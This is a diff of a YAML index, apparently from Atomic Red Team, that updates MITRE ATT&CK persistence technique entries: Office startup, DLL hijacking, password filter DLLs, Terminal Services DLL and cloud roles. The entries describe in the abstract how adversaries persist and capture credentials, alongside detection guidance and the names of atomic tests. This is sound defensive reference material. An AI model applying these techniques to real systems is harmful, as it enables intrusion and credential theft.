+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1137:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:01:21.255Z'
+      name: Office Application Startup
+      description: |-
+        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Nick Carr, Mandiant
       - Microsoft Threat Intelligence Center (MSTIC)
@@ -49625,74 +50006,68 @@ persistence:
       - Praetorian
       - Loic Jaquemet
       - Ricardo Dias
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.4'
+      x_mitre_data_sources:
+      - 'File: File Creation'
+      - 'Application Log: Application Log Content'
+      - 'Windows Registry: Windows Registry Key Modification'
+      - 'File: File Modification'
+      - 'Module: Module Load'
+      - 'Process: Process Creation'
+      - 'Windows Registry: Windows Registry Key Creation'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
       created: '2017-12-14T16:46:06.044Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137
         url: https://attack.mitre.org/techniques/T1137
-      - source_name: SensePost Ruler GitHub
-        url: https://github.com/sensepost/ruler
-        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
-          services. Retrieved February 4, 2019.'
+        external_id: T1137
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
       - source_name: TechNet O365 Outlook Rules
-        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
         description: Koeller, B.. (2018, February 21). Defending Against Rules and
           Forms Injection. Retrieved November 5, 2019.
+        url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
       - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
         description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
           Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: SensePost Ruler GitHub
+        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+          services. Retrieved February 4, 2019.'
+        url: https://github.com/sensepost/ruler
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Office Application Startup
-      description: |-
-        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
-        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      x_mitre_detection: |-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
-        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-      x_mitre_version: '1.3'
+        url: https://github.com/sensepost/notruler
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'File: File Creation'
-      - 'Application Log: Application Log Content'
-      - 'Windows Registry: Windows Registry Key Modification'
-      - 'File: File Modification'
-      - 'Module: Module Load'
-      - 'Process: Process Creation'
-      - 'Windows Registry: Windows Registry Key Creation'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1137
     atomic_tests:
     - name: Office Application Startup - Outlook as a C2
@@ -49716,7 +50091,7 @@ persistence:
         name: command_prompt
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -49746,6 +50121,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -49756,6 +50132,7 @@ persistence:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -49764,13 +50141,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -49812,9 +50189,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -49882,7 +50256,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests:
     - name: Print Processors
@@ -49922,14 +50295,14 @@ persistence:
         elevation_required: true
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -49945,8 +50318,8 @@ persistence:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -49960,7 +50333,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -49986,6 +50359,10 @@ persistence:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -50013,7 +50390,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests:
     - name: DLL Search Order Hijacking - amsi.dll
@@ -50082,37 +50458,7 @@ persistence:
         elevation_required: true
   T1137.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
-      type: attack-pattern
-      created: '2019-11-07T19:52:52.801Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.006
-        url: https://attack.mitre.org/techniques/T1137/006
-      - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
-        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
-        source_name: Microsoft Office Add-ins
-      - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
-        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
-          Persistence. Retrieved July 3, 2017.
-        source_name: MRWLabs Office Persistence Add-ins
-      - source_name: FireEye Mail CDS 2018
-        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
-        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
-          Enterprise Email Compromise. Retrieved April 22, 2019.
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:37:09.190Z'
       name: 'Office Application Startup: Add-ins'
       description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
         on a compromised system. Office add-ins can be used to add functionality to
@@ -50127,13 +50473,18 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Modification'
@@ -50141,11 +50492,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+      created: '2019-11-07T19:52:52.801Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/006
+        external_id: T1137.006
+      - source_name: FireEye Mail CDS 2018
+        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+          Enterprise Email Compromise. Retrieved April 22, 2019.
+        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+      - source_name: MRWLabs Office Persistence Add-ins
+        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+          Persistence. Retrieved July 3, 2017.
+        url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+      - source_name: Microsoft Office Add-ins
+        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+        url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.006
     atomic_tests:
     - name: Code Executed Via Excel Add-in File (XLL)
@@ -50406,7 +50780,7 @@ persistence:
         url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
         description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
           remote code execution. Retrieved June 24, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T17:05:44.321Z'
       name: 'Server Software Component: Transport Agent'
       description: "Adversaries may abuse Microsoft transport agents to establish
         persistent access to systems. Microsoft Exchange transport agents can operate
@@ -50444,8 +50818,6 @@ persistence:
       - SYSTEM
       - Administrator
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.002
     atomic_tests:
     - name: Install MS Exchange Transport Agent Persistence
@@ -50493,7 +50865,7 @@ persistence:
         elevation_required: true
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -50519,7 +50891,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -50561,7 +50933,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -50639,11 +51010,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -50723,35 +51093,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -50775,22 +51120,44 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests:
     - name: Install and Register Password Filter DLL
@@ -50888,51 +51255,18 @@ persistence:
         elevation_required: true
   T1505.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
-      created: '2022-03-28T15:34:44.590Z'
-      x_mitre_version: '1.0'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.005
-        url: https://attack.mitre.org/techniques/T1505/005
-      - source_name: James TermServ DLL
-        url: https://twitter.com/james_inthe_box/status/1150495335812177920
-        description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
-          2022.
-      - source_name: Microsoft System Services Fundamentals
-        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
-        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
-          Retrieved March 28, 2022.
-      - source_name: Microsoft Remote Desktop Services
-        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
-        description: Microsoft. (2019, August 23). About Remote Desktop Services.
-          Retrieved March 28, 2022.
-      - source_name: RDPWrap Github
-        url: https://github.com/stascorp/rdpwrap
-        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
-          Retrieved March 28, 2022.
-      - source_name: Windows OS Hub RDP
-        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
-        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
-          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:42.810Z'
+      name: 'Server Software Component: Terminal Services DLL'
       description: |-
         Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
 
         [Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\System32\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
 
         Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Server Software Component: Terminal Services DLL'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for changes to Registry keys associated with <code>ServiceDll</code> and other subkey values under <code>HKLM\System\CurrentControlSet\services\TermService\Parameters\</code>.
 
@@ -50941,19 +51275,51 @@ persistence:
         Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: <code>reg.exe</code>) or modify/replace the legitimate <code>termsrv.dll</code>.
 
         Monitor module loads by the Terminal Services process (ex: <code>svchost.exe -k termsvcs</code>) for unexpected DLLs (the default is <code>%SystemRoot%\System32\termsrv.dll</code>, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Command: Command Execution'
       - 'File: File Modification'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+      created: '2022-03-28T15:34:44.590Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/005
